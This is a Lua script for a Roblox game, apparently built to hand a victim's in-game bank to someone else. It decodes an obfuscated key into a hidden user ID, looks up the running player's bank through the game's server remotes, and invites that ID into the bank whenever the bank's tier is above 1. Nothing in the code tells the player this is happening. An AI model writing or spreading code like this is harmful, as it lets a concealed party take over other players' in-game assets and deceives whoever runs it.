
function invite()
local A_1 = "b"
local A_2 = "invite to bank"
local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"].MAIN
Event:FireServer(A_1, A_2)

local A_1 = "b"
local A_2 = "get bank"
local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"].MAIN
Event:FireServer(A_1, A_2)

local A_1 = "b"
local A_2 = "get my banks"
local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"].MAIN
Event:FireServer(A_1, A_2)


wait(1)
local A_1 = 
{
}
local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"]["get my banks"]
local val = Event:InvokeServer(A_1)
Bank = val[1][1]["BUID"]
if Bank == nil then
return
end
wait(0.5)
local A_1 = 
{
	[1] = Bank
}
local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"]["get bank"]
local ABCXD = Event:InvokeServer(A_1)
if ABCXD[1]["Tier"] == 1 then
return
end
wait(1)
local A_1 = 
{
	[1] = Bank, 
	[2] = _G.userId
}
local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"]["invite to bank"]
Event:InvokeServer(A_1)
end

return function(key)
key = string.sub(key, 3, #key-2)
local ObSys = {"x", "Y", "d", "f", "t", "s", "p", "R", "_", "o"}
local userid = ""
for i = 1, #key, 1 do
local letter = string.sub(key, i, i)
for i, v in pairs(ObSys) do
if v == letter then
userid = userid..tostring(i-1)
end
end
end
userid = tonumber(userid)
_G.userId = userid
invite()
end
